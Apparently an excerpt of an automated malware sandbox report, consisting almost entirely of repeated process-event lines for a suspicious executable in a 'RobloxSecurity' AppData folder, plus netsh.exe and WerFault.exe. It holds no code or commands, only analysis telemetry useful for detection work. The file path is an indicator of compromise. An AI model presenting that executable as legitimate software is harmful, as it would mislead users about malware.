Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process information set: NOOPENFILEERRORBOX
